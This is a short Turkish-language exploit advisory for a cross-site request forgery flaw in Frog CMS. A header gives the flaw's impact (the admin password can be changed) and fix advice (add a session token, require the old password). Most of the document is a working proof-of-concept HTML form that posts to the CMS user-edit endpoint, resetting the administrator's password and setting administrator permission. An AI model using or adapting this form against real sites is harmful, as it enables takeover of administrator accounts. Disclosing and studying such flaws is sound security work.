< ------------------- header data start ------------------- >

#############################################################

# Application Name : Frog CMS

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirebilir ..

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli,Eski sifre sorulmalidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form action=http://demo.opensourcecms.com/frog/admin/?/user/edit/1 method=post>
<input class=textbox id=user_name maxlength=100 name=user[name] size=40 type=text value=Administrator /><br>
<input class=textbox id=user_email maxlength=255 name=user[email] size=40 type=text value=[email protected] /><br>
<input class=textbox id=user_username maxlength=40 name=user[username] size=40 type=text value=admin disabled=disabled /><br>
<input class=textbox id=user_password maxlength=40 name=user[password] size=40 type=password value= />(Sifre)<br>
<input class=textbox id=user_confirm maxlength=40 name=user[confirm] size=40 type=password value= />(Tekrar Sifre)<br>
<span class=checkbox><input checked=checked id=user_permission-administrator name=user_permission[administrator] type=checkbox value=1 /> <label for=user_permission-administrator>Administrator</label></span>
<span class=checkbox><input id=user_permission-developer name=user_permission[developer] type=checkbox value=2 /> <label for=user_permission-developer>Developer</label></span>
<span class=checkbox><input id=user_permission-editor name=user_permission[editor] type=checkbox value=3 /> <label for=user_permission-editor>Editor</label></span><br>
<input class=button name=commit type=submit accesskey=s value=Save /><br>
</form>

< -- bug code end of -- >